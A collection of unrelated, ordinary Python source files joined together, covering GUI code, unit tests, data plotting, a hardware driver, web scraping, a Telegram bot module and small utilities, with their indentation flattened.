self.pushButton.setText(_translate("MainWindow", "More Details: 1", None))
self.pushButton_2.setText(_translate("MainWindow", "More Details: 2", None))
self.pushButton_3.setText(_translate("MainWindow", "More Details: 3", None))
self.pushButton_4.setText(_translate("MainWindow", "More Details: 4", None))
self.pushButton_5.setText(_translate("MainWindow", "More Details: 5", None))
self.pushButton_6.setText(_translate("MainWindow", "More Details: 6", None))
self.label.setText(_translate("MainWindow", "1: Captain America: Civil War (2016)", None))
self.label_2.setText(_translate("MainWindow", "2: Good Will Hunting (1997)", None))
self.label_3.setText(_translate("MainWindow", "3: Black Hawk Down (2001)", None))
self.label_4.setText(_translate("MainWindow", "4: Jimmy Neutron Boy Genius (2001)", None))
self.label_5.setText(_translate("MainWindow", "5: Despicable Me (2010)", None))
self.label_6.setText(_translate("MainWindow", "6: Watchmen (2009)", None))
self.menuFile.setTitle(_translate("MainWindow", "File", None))
self.actionOpen.setText(_translate("MainWindow", "Open", None))
self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+O", None))
self.actionSave.setText(_translate("MainWindow", "Save", None))
self.actionSave.setShortcut(_translate("MainWindow", "Ctrl+S", None))
self.actionQuit.setText(_translate("MainWindow", "Quit", None))
self.actionQuit.setShortcut(_translate("MainWindow", "Ctrl+Q", None))
def openWatchlist(self):
wlPath = QtGui.QFileDialog.getOpenFileName(MainWindow,
'Open watchlist file', 'c:\\', 'Watchlist files (*.wl)')
print wlPath, "\n"
with open(wlPath, "r") as wlFile:
print wlFile.read()
# This code in the scope of this 'if statement' runs if the code is executed directly, as opposed to being imported
# in another Python script. This is where the execution of the program code begins.
if __name__ == "__main__":
# The 'sys' module is imported to allow the program's execution to be halted once the user has
# closed the application.
import sys
# The application object is defined. 'sys.argv' represents a list of parameters provided by the user
# when executing the program from the terminal / command prompt. Our program doesn't make use of any, but it is
# convention in PyQt programming to accept them.
app = QtGui.QApplication(sys.argv)
# A generic window object is instantiated to be used as a parameter of the'setupUi' method of
# the 'Ui_Mainwindow' class.
icon = QtGui.QIcon()
icon.addFile('images/SELogoSmall.png', QtCore.QSize(256, 256))
app.setWindowIcon(icon)
MainWindow = QtGui.QMainWindow()
# The main / home window of the application is instatiated as 'ui', and its setup method is called
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
# The main window is displayed to the user.
MainWindow.show()
# When the execution of the application has been ended by the user, the scripts execution stops.
sys.exit(app.exec_()) |
import json
import unittest
from json import JSONDecodeError
from unittest.mock import patch, Mock
from spresso.model.base import Composition, User, JsonSchema, Origin
from spresso.utils.base import get_url
class CompositionTestCase(unittest.TestCase):
def test_init(self):
c = Composition()
self.assertEqual(c, {})
def test_from_json(self):
test = dict(key="value")
test_json = json.dumps(test)
c = Composition()
c.from_json(test_json)
self.assertEqual(c, test)
invalid_json = "json fail"
self.assertRaises(JSONDecodeError, c.from_json, invalid_json)
def test_to_json(self):
c = Composition(key="value")
test = dict(key="value")
test_json = json.dumps(test)
self.assertEqual(c.to_json(), test_json)
def test_set_get(self):
c = Composition(key="value")
self.assertEqual(c.key, "value")
c.key = "test"
self.assertEqual(c.key, "test")
class JsonSchemaTestCase(unittest.TestCase):
@patch("spresso.model.base.validate")
@patch("spresso.model.base.get_resource")
@patch("spresso.model.base.json")
def test_validate(self, json_mock, get_resource_mock, validate_mock):
json_schema = JsonSchema()
data = ""
json_mock.loads.return_value = "schema"
get_resource_mock.return_value = "resource"
json_schema.validate(data)
json_mock.loads.assert_called_once_with("resource")
validate_mock.assert_called_once_with(data, "schema")
@patch("spresso.model.base.get_resource")
def test_get_schema(self, resource_mock):
json_schema = JsonSchema()
resource_mock.return_value = "schema"
schema = json_schema.get_schema()
resource_mock.assert_called_once_with("resources/", "")
self.assertEqual(schema, "schema")
def test_str(self):
json_schema = JsonSchema()
self.assertEqual(str(json_schema), 'JsonSchema({})')
class OriginTestCase(unittest.TestCase):
@patch("spresso.model.base.get_url")
@patch("spresso.model.base.urlparse")
def test_origin(self, urlparse_mock, get_url_mock):
header = "header"
settings = Mock()
settings.scheme = "scheme"
settings.domain = "domain"
origin = Origin(header, settings=settings)
get_url_mock.return_value = "url"
urlparse_mock.return_value = "urlparse"
self.assertTrue(origin.valid)
get_url_mock.assert_called_once_with("scheme", "domain")
self.assertEqual(urlparse_mock.call_count, 2)
def test_functional(self):
scheme = "http"
netloc = "example.com"
url = get_url(scheme, netloc)
settings = Mock()
settings.scheme = scheme
settings.domain = netloc
origin = Origin(url, settings=settings)
self.assertEqual(origin.expected, scheme + "://" + netloc)
self.assertTrue(origin.valid)
scheme = "https"
mismatching_url = get_url(scheme, netloc)
origin = Origin(mismatching_url, settings=settings)
self.assertFalse(origin.valid)
class UserTestCase(unittest.TestCase):
def test_netloc(self):
user = User(None)
self.assertIsNone(user.netloc)
user.email = "test@test"
self.assertEqual(user.netloc, "test")
def test_valid(self):
user = User(None)
self.assertFalse(user.is_valid)
user.email = "test@test"
self.assertTrue(user.is_valid)
def test_basic_check(self):
invalid_email = "test#d@test"
user = User(invalid_email)
self.assertFalse(user.basic_check())
valid_email = "test@test"
user.email = valid_email
self.assertTrue(user.basic_check())
|
import ftplib
import glob
import subprocess as sp
import csv
import numpy as np
import netCDF4 as nc4
import pygrib as pg
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import datetime
import scipy
import os
import sys
from mpl_toolkits.basemap import Basemap
from matplotlib.patches import Polygon
from matplotlib.colors import LinearSegmentedColormap
from scipy.spatial import Delaunay
from scipy.interpolate import LinearNDInterpolator
from shutil import copyfile
sys.stdout = open('/gpfs_backup/stormtrack/jtradfor/ensemble_data/wxenviz.github.io/logfile','a+')
print 'starting rpb'
os.chdir('/gpfs_backup/stormtrack/jtradfor/ensemble_data/wxenviz.github.io/')
def pb(reflectivities,outname):
plt.figure(figsize=(16,9))
m = Basemap(projection='lcc',lat_0=5,lon_0=-100,llcrnrlon=-126,llcrnrlat=23,urcrnrlon=-63,urcrnrlat=50,resolution='h')
shp_info = m.readshapefile('/gpfs_backup/stormtrack/jtradfor/ensemble_data/reference/st99_d00','states',drawbounds=False)
ax = plt.gca()
for nshape,seg in enumerate(m.states):
poly = Polygon(seg,facecolor='white',edgecolor='white',zorder=1,linewidth=1)
poly2 = Polygon(seg,facecolor='none',edgecolor='black',zorder=3,linewidth=1)
ax.add_patch(poly)
ax.add_patch(poly2)
reflectivities_copy = np.copy(reflectivities)
reflect_pb = np.zeros_like(reflectivities_copy[0])
for c,reflect_member in enumerate(reflectivities_copy):
reflect_member[reflect_member<40] = 0
reflect_member[reflect_member>=40] = c+1
reflect_pb = np.max([reflect_pb,reflect_member],axis=0)
reflect_pb[reflect_pb==0] = np.nan
reflect_pb[-50:,:] = np.nan
reflect_pb[:50,:] = np.nan
reflect_pb[:,:50] = np.nan
reflect_pb[:,-50:] = np.nan
m.imshow(reflect_pb,zorder=2,cmap='tab10',interpolation='none',vmin=1,vmax=10)
plt.box(False)
pbfil = '/gpfs_backup/stormtrack/jtradfor/ensemble_data/wxenviz.github.io/uploads/outimages/hrrre/' + outname + '_R_pb.png'
plt.savefig(pbfil,facecolor='#101010',bbox_inches='tight',dpi=500)
plt.close()
datapaths = glob.glob('/gpfs_backup/stormtrack/jtradfor/ensemble_data/rawdata/hrrre/*creflect*')
dateis = []
if len(datapaths)>0:
latest = 0
latestpath = datapaths[0]
for datapath in datapaths:
if int(os.path.basename(datapath)[9:11]) > latest:
latest = int(os.path.basename(datapath)[9:11])
latestpath = datapath
fil = os.path.basename(latestpath)[0:13]
reflectivities = np.load(latestpath)
pbsdfil = pb(reflectivities,fil)
|
from sys import exit
try:
from cap1xxx import Cap1166, PID_CAP1166
except ImportError:
exit("This library requires the cap1xxx module\nInstall with: sudo pip install cap1xxx")
I2C_ADDR = 0x2c
UP = 1
DOWN = 2
LEFT = 3
RIGHT = 5
BUTTON = 4
CANCEL = 0
_cap1166 = Cap1166(i2c_addr=I2C_ADDR)
_cap1166._write_byte(0x26, 0b00111111) # Force recalibration
for x in range(6):
_cap1166.set_led_linking(x, False)
def high_sensitivity():
"""Switch to high sensitivity mode
This predetermined high sensitivity mode is for using
touch through 3mm perspex or similar materials.
"""
_cap1166._write_byte(0x00, 0b11000000)
_cap1166._write_byte(0x1f, 0b00000000)
def enable_repeat(enable):
"""Enable touch hold repeat
If enable is true, repeat will be enabled. This will
trigger new touch events at the set repeat_rate when
a touch input is held.
:param enable: enable/disable repeat: True/False
"""
if enable:
_cap1166.enable_repeat(0b11111111)
else:
_cap1166.enable_repeat(0b00000000)
def set_repeat_rate(rate):
"""Set hold repeat rate
Repeat rate values are clamped to the nearest 35ms,
values from 35 to 560 are valid.
:param rate: time in ms from 35 to 560
"""
_cap1166.set_repeat_rate(rate)
def on(buttons, bounce=-1):
"""Handle a press of one or more buttons
Decorator. Use with @captouch.on(UP)
:param buttons: List, or single instance of cap touch button constant
:param bounce: Maintained for compatibility with Dot3k joystick, unused
"""
buttons = buttons if isinstance(buttons, list) else [buttons]
def register(handler):
for button in buttons:
_cap1166.on(channel=button, event='press', handler=handler)
_cap1166.on(channel=button, event='held', handler=handler)
return register
def bind_defaults(menu):
"""Bind the default controls to a menu instance
This should be used in conjunction with a menu class instance
to bind touch inputs to the default controls.
"""
@on(UP)
def handle_up(ch, evt):
menu.up()
@on(DOWN)
def handle_down(ch, evt):
menu.down()
@on(LEFT)
def handle_left(ch, evt):
menu.left()
@on(RIGHT)
def handle_right(ch, evt):
menu.right()
@on(BUTTON)
def handle_button(ch, evt):
menu.select()
@on(CANCEL)
def handle_cancel(ch, evt):
menu.cancel()
|
#!/usr/bin/env python3
import numpy as np
import matplotlib
# Force matplotlib to not use any X Windows backend (must be called befor importing pyplot)
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def plotDataPoints(X, idx, K, i):
#PLOTDATAPOINTS plots data points in X, coloring them so that those with the same
#index assignments in idx have the same color
# PLOTDATAPOINTS(X, idx, K) plots data points in X, coloring them so that those
# with the same index assignments in idx have the same color
# Create palette
cmap = plt.cm.rainbow
# Plot the data
plt.scatter(X[:, 0], X[:, 1], c=np.array(idx[i]), cmap=cmap, marker='o', s=8**2, lw=1)
#end
|
import typing as t
import logging
from typing import TYPE_CHECKING
logger = logging.getLogger("bentoml.tests")
if TYPE_CHECKING:
from aiohttp.typedefs import LooseHeaders
from starlette.datastructures import Headers
from starlette.datastructures import FormData
async def parse_multipart_form(headers: "Headers", body: bytes) -> "FormData":
"""
parse starlette forms from headers and body
"""
from starlette.formparsers import MultiPartParser
async def async_bytesio(bytes_: bytes) -> t.AsyncGenerator[bytes, None]:
yield bytes_
yield b""
return
parser = MultiPartParser(headers=headers, stream=async_bytesio(body))
return await parser.parse()
async def async_request(
method: str,
url: str,
headers: t.Union[None, t.Tuple[t.Tuple[str, str], ...], "LooseHeaders"] = None,
data: t.Any = None,
timeout: t.Optional[int] = None,
assert_status: t.Union[int, t.Callable[[int], bool], None] = None,
assert_data: t.Union[bytes, t.Callable[[bytes], bool], None] = None,
assert_headers: t.Optional[t.Callable[[t.Any], bool]] = None,
) -> t.Tuple[int, "Headers", bytes]:
"""
raw async request client
"""
import aiohttp
from starlette.datastructures import Headers
async with aiohttp.ClientSession() as sess:
async with sess.request(
method, url, data=data, headers=headers, timeout=timeout
) as r:
r_body = await r.read()
if assert_status is not None:
if callable(assert_status):
assert assert_status(r.status), f"{r.status} {repr(r_body)}"
else:
assert r.status == assert_status, f"{r.status} {repr(r_body)}"
if assert_data is not None:
if callable(assert_data):
assert assert_data(r_body), r_body
else:
assert r_body == assert_data, r_body
if assert_headers is not None:
assert assert_headers(r.headers), repr(r.headers)
headers = t.cast(t.Mapping[str, str], r.headers)
return r.status, Headers(headers), r_body
|
from argparse import ArgumentParser
from . import __version__
parser = ArgumentParser(
prog="sqlite3_shell",
description="Python SQLite3 shell"
)
parser.add_argument(
"--version", action="version", version=f"sqlite3-shell {__version__}"
)
parser.add_argument(
"database", default=":memory:", nargs="?",
help="database file to connect to; by default a temporary in-memory one"
)
parser.add_argument(
"-i", "--init", metavar="file",
help="file with SQL code to run before interactive input is opened. "
)
parser.add_argument(
"-v", "--verbosity", default="none",
choices=["debug", "info", "warning", "error", "critical", "none"],
help="logging level. only messages at and above that level will be logged"
)
formatGroup = parser.add_argument_group(
"Formatting options",
description="Options for formatting output"
)
formatGroup.add_argument(
"-f", "--format",
choices=["csv", "html", "json"],
help="format to output data in"
)
formatGroup.add_argument(
"--headers", action="store_true",
help="whether or not to include table headings in output"
)
formatGroup.add_argument(
"-s", "--sep", default="|", metavar="separator",
help="string to use to separate cells in default output mode; default '|'"
)
formatGroup.add_argument(
"-p", "--pretty", action="store_true",
help="whether to prettify output"
)
formatGroup.add_argument(
"-be", "--blob-encoding", default="hex",
choices=["base64", "base85", "hex", "raw"],
help="encoding to output blobs in"
)
formatGroup.add_argument(
"-bf", "--blob-format", default="BLOB:{}",
help="format to output blobs in. .format will be called with the encoded blob. " \
"default 'BLOB:{}'"
)
formatGroup.add_argument(
"-n", "--null-value", default="NULL",
help="string representation of NULL, default 'NULL'"
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import dash_core_components as dcc
import dash_html_components as html
from utilities.models import *
from honeycomb import *
@db_session
def load_statistics(statistic):
"""This function takes a string as parameter and returns a certain value, which is then displayed in the statistics
bar on the content-block settings page.
"""
if statistic == 'total':
return select(p for p in Block if p.active).count()
elif statistic == 'urltype':
return select(p for p in Block if p.type == 'Url' and p.active).count()
elif statistic == 'keywordtype':
return select(p for p in Block if p.type == 'Keyword' and p.active).count()
# Creating a dataframe and filling it with one row: No data loaded.
df = pd.DataFrame(columns=['Type',
'Value',
'Status'])
df = df.append({'Type': 'No data loaded'}, ignore_index=True)
# Defining the lay-out of this page.
layout = html.Div([
html.H3('Content Block Settings',
style={'text-align': 'center'}),
html.P('''On this page, the content block settings for HIVE can be set.
Blocked content will not be stored in the database and will simply be ignored.
The statistics are refreshed every 30 seconds. Read the User Guide before using this feature.''',
style={'width': 380,
'marginLeft': 'auto',
'marginRight': 'auto',
'textAlign': 'center',
'marginBottom': 10}),
html.Div([
html.Div([
html.Div(children=load_statistics('total'),
id='BlockStatisticsBox1',
className='statisticsBox'),
html.Div(children='Total',
className='title'),
html.Div(children='Amount of active rules in the database',
className='description')
], className='statisticsWrapper'),
html.Div([
html.Div(children=load_statistics('urltype'),
className='statisticsBox',
id='BlockStatisticsBox2'),
html.Div(children='URL',
className='title'),
html.Div(children='Amount of active URL rules',
className='description')
], className='statisticsWrapper'),
html.Div([
html.Div(children=load_statistics('keywordtype'),
className='statisticsBox',
id='BlockStatisticsBox3'),
html.Div(children='Keyword',
className='title'),
html.Div(children='Amount of active Keyword rules',
className='description')
], className='statisticsWrapper'),
html.Button('Refresh statistics',
id='refresh-block-statistics',
className='refresh_button')
], className='statisticsRow'),
html.Div([
dcc.Input(id='block-input-box',
type='text',
style={'width': 480},
placeholder='String-match which needs to be blocked'),
dcc.RadioItems(
id='block-category',
options=[
{'label': 'Keyword',
'value': 'Keyword'},
{'label': 'URL',
'value': 'Url'}
],
value='Keyword',
labelStyle={'display': 'inline-block'}),
html.Button('Submit',
id='blocksubmit',
style={'marginLeft': 20}),
html.Button('Load table',
id='reload-button',
style={'marginLeft': 20,
'float': 'right'}),
html.Br(),
html.Br(),
html.Div(id='output-container-block')
]),
html.Br(),
html.Div(
dt.DataTable(
rows=df.to_dict('records'),
sortable=True,
row_selectable=True,
filterable=True,
selected_row_indices=[],
id='block-table')
),
html.Button('Set active',
id='block_set_active',
style={'marginTop': 20,
'float': 'left'}),
html.Div(id='block_activate_warning'),
html.Button('Set inactive',
id='block_set_inactive',
style={'marginTop': 20,
'marginLeft': 20,
'float': 'left'}),
html.Div(id='block_inactivate_warning')
], style={'paddingBottom': 55})
|
# -*- coding: utf-8 -*-
import pandas as pd
from zvt.api.data_type import Region, Provider, EntityType
from zvt.domain import Stock, StockDetail
from zvt.recorders.consts import YAHOO_STOCK_LIST_HEADER
from zvt.contract.recorder import RecorderForEntities
from zvt.contract.api import df_to_db
from zvt.networking.request import sync_get
from zvt.utils.time_utils import to_pd_timestamp
class ExchangeUsStockListRecorder(RecorderForEntities):
region = Region.CHN
provider = Provider.Exchange
data_schema = Stock
def init_entities(self):
self.entities = ['nyse', 'nasdaq', 'amex']
def generate_domain_id(self, entity, df):
return df['entity_type'] + '_' + df['exchange'] + '_' + df['code']
def get_original_time_field(self):
return 'list_date'
def process_loop(self, entity, http_session):
url = 'https://api.nasdaq.com/api/screener/stocks'
params = {'download': 'true', 'exchange': entity}
resp = sync_get(http_session, url, headers=YAHOO_STOCK_LIST_HEADER, params=params, enable_proxy=False)
if resp is None:
return
json = resp.json()['data']['rows']
if len(json) > 0:
df = self.format(content=json, exchange=entity)
self.persist(df)
return None
def format(self, content, exchange):
df = pd.DataFrame(content)
if df is not None:
df.rename(columns={'symbol': 'code', 'ipoyear': 'list_date', 'marketCap': 'market_cap'}, inplace=True)
timestamp_str = self.get_original_time_field()
df.fillna({timestamp_str: '1980'}, inplace=True)
df[timestamp_str] = df[timestamp_str].apply(lambda x: to_pd_timestamp(x))
df['entity_type'] = EntityType.Stock.value
df['exchange'] = exchange
df['code'] = df['code'].str.strip()
df['id'] = self.generate_domain_id(exchange, df)
df['entity_id'] = df['id']
df.drop_duplicates(subset=('id'), keep='last', inplace=True)
return df
def persist(self, df):
# persist to Stock
df_to_db(df=df, ref_df=None, region=Region.US, data_schema=self.data_schema, provider=self.provider, force_update=True)
# persist to StockDetail
df_to_db(df=df, ref_df=None, region=Region.US, data_schema=StockDetail, provider=self.provider, force_update=True)
def on_finish(self):
self.logger.info("persist stock list successs")
__all__ = ['ExchangeUsStockListRecorder']
if __name__ == '__main__':
spider = ExchangeUsStockListRecorder()
spider.run()
|
#!/usr/bin/env python
import tamasis as tm
import csh
import csh.score
import numpy as np
import lo
import scipy.sparse.linalg as spl
# data
pacs = tm.PacsObservation(filename=tm.tamasis_dir+'tests/frames_blue.fits',
fine_sampling_factor=1, keep_bad_detectors=True)
tod = pacs.get_tod()
# compression model
#C = lo.binning(tod.shape, factor=8, axis=1, dtype=np.float64)
shape = (64, 32) + (tod.shape[1], )
C = csh.binning3d( shape, factors=(2, 2, 2))
# compress data
ctod = C * tod.flatten()
# projector
projection = tm.Projection(pacs, resolution=3.2, oversampling=False,
npixels_per_sample=6)
model = projection
# naive map
backmap = model.transpose(tod)
# transform to lo
#P = lo.ndsubclass(backmap, tod, matvec=model.direct, rmatvec=model.transpose)
P = lo.aslinearoperator(model.aslinearoperator())
# full model
A = C * P
# priors
Dx = lo.diff(backmap.shape, axis=0, dtype=np.float64)
Dy = lo.diff(backmap.shape, axis=1, dtype=np.float64)
#Dw = lo.pywt_lo.wavedec2(backmap.shape, "haar")
# inversion
y = ctod.flatten()
x, conv = lo.rls(A, (Dx, Dy), (1e1, 1e1), y)
sol = backmap.zeros(backmap.shape)
sol[:] = x.reshape(sol.shape)
# L2 score
Md = (A.T * A).todense()
bin_score = csh.score.score(Md)
print("score of binning3d strategy " + str(bin_score))
|
import matplotlib.gridspec
import matplotlib.pyplot as plt
import numpy as np
from predicu.data import CUM_COLUMNS
from predicu.plot import COLUMN_TO_HUMAN_READABLE
data_source = ["bedcounts"]
def plot(data):
n_rows = (len(CUM_COLUMNS) + len(CUM_COLUMNS) % 2) // 2
fig = plt.figure(figsize=(n_rows * 5, 10))
gs = matplotlib.gridspec.GridSpec(n_rows, 2)
ax0 = None
for i, col in enumerate(CUM_COLUMNS):
ax = fig.add_subplot(gs[i // 2, i % 2], sharex=ax0)
if ax0 is None:
ax0 = ax
for g, d in data.groupby("department"):
d = d.groupby("date")[col].sum().sort_index()
ax.plot(np.arange(d.values.shape[0]), d.values, label=g)
ax.set_title(COLUMN_TO_HUMAN_READABLE[col])
dates = np.array(sorted(data.date.unique().flatten()))
xticks = np.arange(0, len(dates), 3)
ax.set_xticks(xticks)
ax.set_xticklabels(
[date.strftime("%d-%m") for date in dates[xticks]], rotation=45,
)
ax0.legend(ncol=2, loc="upper left", frameon=True, fontsize="xx-small")
fig.tight_layout()
fig.subplots_adjust(hspace=0.2)
tikzplotlib_kwargs = dict(
extra_groupstyle_parameters={
r"horizontal sep=0.2cm",
r"vertical sep=3cm",
}
)
return fig, tikzplotlib_kwargs
|
from setuptools import setup, find_packages
setup(name='backstabbr_api',
version='1.0.2',
description='Web-scraper API and Discord Bot for the online diplomacy program Backstabbr',
url='https://github.com/afkhurana/backstabbr_api',
author='Arjun Khurana',
author_email='afkhurana@gmail.com',
license='MIT',
packages=['backstabbr_api', 'backstabbr_bot'],
install_requires=["discord.py", "html5print", "requests"])
|
"""
今天,书店老板有一家店打算试营业 customers.length 分钟。每分钟都有一些顾客(customers[i])会进入书店,所有这些顾客都会在那一分钟结束后离开。
在某些时候,书店老板会生气。 如果书店老板在第 i 分钟生气,那么 grumpy[i] = 1,否则 grumpy[i] = 0。 当书店老板生气时,那一分钟的顾客就会不满意,不生气则他们是满意的。
书店老板知道一个秘密技巧,能抑制自己的情绪,可以让自己连续 X 分钟不生气,但却只能使用一次。
请你返回这一天营业下来,最多有多少客户能够感到满意的数量。
示例:
输入:customers = [1,0,1,2,1,1,7,5], grumpy = [0,1,0,1,0,1,0,1], X = 3
输出:16
解释:
书店老板在最后 3 分钟保持冷静。
感到满意的最大客户数量 = 1 + 1 + 1 + 1 + 7 + 5 = 16.
提示:
1 <= X <= customers.length == grumpy.length <= 20000
0 <= customers[i] <= 1000
0 <= grumpy[i] <= 1
"""
from typing import List
class Solution:
def maxSatisfied(self, customers: List[int], grumpy: List[int], X: int) -> int:
# 把抑制生气时间作为一个窗口,计算每一分钟窗口的客户好感增值的最大值
# 返回 本来好感的客户数+抑制生气带来的客户好感的最大增值
delta = 0;
total = 0;
for i in range(0,X):
if grumpy[i] == 1:
delta += customers[i]
else:
total += customers[i];
current = delta
# 把生气窗口往后移,计算新窗口的增值
for i in range(X,len(grumpy)):
if grumpy[i-X] == 1:
current -= customers[i-X]
if grumpy[i] == 1:
current += customers[i]
else:
total += customers[i]
delta = max(current,delta);
return total + delta;
if __name__=='__main__':
s = Solution()
assert s.maxSatisfied([1,0,1,2,1,1,7,5],[0,1,0,1,0,1,0,1],3) == 16 |
"""The STOMP command and header name strings.
"""
HDR_ACCEPT_VERSION = 'accept-version'
HDR_ACK = 'ack'
HDR_CONTENT_LENGTH = 'content-length'
HDR_CONTENT_TYPE = 'content-type'
HDR_DESTINATION = 'destination'
HDR_HEARTBEAT = 'heart-beat'
HDR_HOST = 'host'
HDR_ID = 'id'
HDR_MESSAGE_ID = 'message-id'
HDR_LOGIN = 'login'
HDR_PASSCODE = 'passcode'
HDR_RECEIPT = 'receipt'
HDR_SUBSCRIPTION = 'subscription'
HDR_TRANSACTION = 'transaction'
CMD_ABORT = 'ABORT'
CMD_ACK = 'ACK'
CMD_BEGIN = 'BEGIN'
CMD_COMMIT = 'COMMIT'
CMD_CONNECT = 'CONNECT'
CMD_DISCONNECT = 'DISCONNECT'
CMD_NACK = 'NACK'
CMD_STOMP = 'STOMP'
CMD_SEND = 'SEND'
CMD_SUBSCRIBE = 'SUBSCRIBE'
CMD_UNSUBSCRIBE = 'UNSUBSCRIBE'
|
#!/usr/bin/env python
"""
convnet/prep.py
Grabs the first two classes of CIFAR10 and saves them as numpy arrays
Since we don't assume everyone has access to GPUs, we do this to create
a dataset that can be trained in a reasonable amount of time on a CPU.
"""
import os
import sys
import numpy as np
import torch
from torchvision import transforms, datasets
if __name__ == "__main__":
# --
# Load data
print('prep.py: dowloading cifar10', file=sys.stderr)
trainset = datasets.CIFAR10(root='./data', train=True, download=True, transform=transforms.ToTensor())
testset = datasets.CIFAR10(root='./data', train=False, download=True, transform=transforms.ToTensor())
X_train, y_train = zip(*[(x, y) for x, y in trainset if y <= 1])
X_test, y_test = zip(*[(x, y) for x, y in testset if y <= 1])
X_train = np.array(torch.stack(X_train)).astype(np.float32)
X_test = np.array(torch.stack(X_test)).astype(np.float32)
y_train = np.array(y_train).astype(np.int64)
y_test = np.array(y_test).astype(np.int64)
# --
# Scale and center data
X_mean = X_train.transpose(1, 0, 2, 3).reshape(3, -1).mean(axis=-1).reshape(1, 3, 1, 1)
X_std = X_train.transpose(1, 0, 2, 3).reshape(3, -1).std(axis=-1).reshape(1, 3, 1, 1)
X_train = (X_train - X_mean) / X_std
X_test = (X_test - X_mean) / X_std
# --
# Save to file
os.makedirs('data/cifar2', exist_ok=True)
print('prep.py: saving to data/cifar2', file=sys.stderr)
np.save('data/cifar2/X_train.npy', X_train)
np.save('data/cifar2/X_test.npy', X_test)
np.save('data/cifar2/y_train.npy', y_train)
np.save('data/cifar2/y_test.npy', y_test)
|
from pyrogram import filters
from pyrogram.types import Message
from wbb import BOT_ID, SUDOERS, USERBOT_PREFIX, app2
from wbb.core.decorators.errors import capture_err
from wbb.modules.userbot import edit_or_reply
from wbb.utils.dbfunctions import add_sudo, get_sudoers, remove_sudo
from wbb.utils.functions import restart
__MODULE__ = "Sudo"
__HELP__ = """
**MODULI HII NI KWA AJILI YA DEVELOPERS TU**
.useradd - Kuongeza Mtumiaji Katika Sudoers.
.userdel - Kutoa Mtumiaji Katika Sudoers
.sudoers - Kuorodhesha Watumiaji wa Sudo.
**NOTE:**
Wala msiongezee mwenye kufuru, isipo kuwa kwa kuamini.
watumiaji wa sudo wanaweza kufanya chochote na akaunti yako,
inaweza hata kufuta akaunti yako.
"""
@app2.on_message(
filters.command("useradd", prefixes=USERBOT_PREFIX)
& filters.user(SUDOERS)
)
@capture_err
async def useradd(_, message: Message):
if not message.reply_to_message:
return await edit_or_reply(
message,
text="Jibu ujumbe wa mtu wa kumongeza kwa sudoer.",
)
user_id = message.reply_to_message.from_user.id
sudoers = await get_sudoers()
if user_id in sudoers:
return await edit_or_reply(
message, text="Mtumiaji tayari yuko katika sudoer."
)
if user_id == BOT_ID:
return await edit_or_reply(
message, text="Huwezi kuongeza bot msaidizi katika sudoers."
)
added = await add_sudo(user_id)
if added:
await edit_or_reply(
message,
text="Imefanikiwa kuongeza mtumiaji katika sudoers, Bot itaanzishwa upya sasa.",
)
return await restart(None)
await edit_or_reply(
message, text="Kitu kibaya kilitokea, angalia logs."
)
@app2.on_message(
filters.command("userdel", prefixes=USERBOT_PREFIX)
& filters.user(SUDOERS)
)
@capture_err
async def userdel(_, message: Message):
if not message.reply_to_message:
return await edit_or_reply(
message,
text="Jibu ujumbe wa mtu wa kumwondoa kwenye sudoers.",
)
user_id = message.reply_to_message.from_user.id
if user_id not in await get_sudoers():
return await edit_or_reply(
message, text="mtumiaji hayuko sudoers."
)
removed = await remove_sudo(user_id)
if removed:
await edit_or_reply(
message,
text="Imefanikiwa kuondolewa mtumiaji kutoka kwa sudoer, Bot itaanzishwa upya sasa.",
)
return await restart(None)
await edit_or_reply(
message, text="Kitu kibaya kilitokea, angalia logs."
)
@app2.on_message(
filters.command("sudoers", prefixes=USERBOT_PREFIX)
& filters.user(SUDOERS)
)
@capture_err
async def sudoers_list(_, message: Message):
sudoers = await get_sudoers()
text = ""
for count, user_id in enumerate(sudoers, 1):
user = await app2.get_users(user_id)
user = user.first_name if not user.mention else user.mention
text += f"{count}. {user}\n"
await edit_or_reply(message, text=text)
|
import re
from collections import defaultdict
import math
from lxml import html
from lxml import etree
from .book import Book
from .quote import Quote
from .page_loader import download_page, wait_for_delay
def error_handler(where, raw):
"""
Обработчик ошибки при парсинге html страницы
:param where: string - что не распарсилось
:param raw: html-узел
:return: None
"""
print('ERROR: Parsing error (%s not parsed):' % where)
print(etree.tostring(raw))
print()
return None
def try_get_book_link(link):
"""
Проверяет валидность ссылки на книгу
:param link: string - ссылка
:return: string or None
"""
if "/book/" in link or "/work/" in link:
return link
return None
def try_get_quote_link(link):
"""
Проверяет валидность ссылки на цитату
:param link: string - ссылка
:return: string or None
"""
if "/quote/" in link:
return link
return None
def try_parse_month(raw_month):
"""
Возвращает месяц в нужном виде
:param raw_month: string - месяц в текстовом виде
:return: string - месяц в цифровом виде
"""
dict = defaultdict(lambda: '01', {
'Январь': '01',
'Февраль': '02',
'Март': '03',
'Апрель': '04',
'Май': '05',
'Июнь': '06',
'Июль': '07',
'Август': '08',
'Сентябрь': '09',
'Октябрь': '10',
'Ноябрь': '11',
'Декабрь': '12'
})
return dict[raw_month]
def is_last_page(page):
"""
Проверяет, что на странице уже пустой список объектов (она последняя)
:param page: страница
:return: bool
"""
return bool(len(page.xpath('//div[@class="with-pad"]')))
def is_redirecting_page(page):
"""
Проверяет, что страница является перенаправляющей
:param page: страница
:return: bool
"""
flag = bool(len(page.xpath('//div[@class="page-404"]')))
if flag:
print('ERROR: Oops! Livelib suspects that you are a bot! Reading stopped.')
print()
return flag
def href_i(href, i):
"""
Возвращает ссылку на i-ую страницу данного типа
:param href: string - ссылка на страницу
:param i: int - номер страницы
:return: string - нужная ссылка
"""
return href + '/~' + str(i)
def date_parser(date):
"""
Конвертирует дату в нужный формат
:param date: string
:return: string or None
"""
m = re.search('\d{4} г.', date)
if m is not None:
year = m.group(0).split(' ')[0]
raw_month = date.split(' ')[0]
month = try_parse_month(raw_month)
return '%s-%s-01' % (year, month)
return None
def handle_xpath(html_node, request, i=0):
"""
Обертка над xpath. Возвращает i-ый найденный узел. Если он не нашелся, то возвращается None
:param html_node: html-узел
:param request: string - xpath запрос
:param i: int - индекс (по дефолту 0)
:return: нужный html-узел или None
"""
if html_node is None:
return None
tmp = html_node.xpath(request)
return tmp[i] if i < len(tmp) else None
def format_quote_text(text):
"""
Обработка текста цитаты (удаление табов, переходов на новую строку)
:param text: string or None
:return: string or None
"""
return None if text is None else text.replace('\t', ' ').replace('\n', ' ')
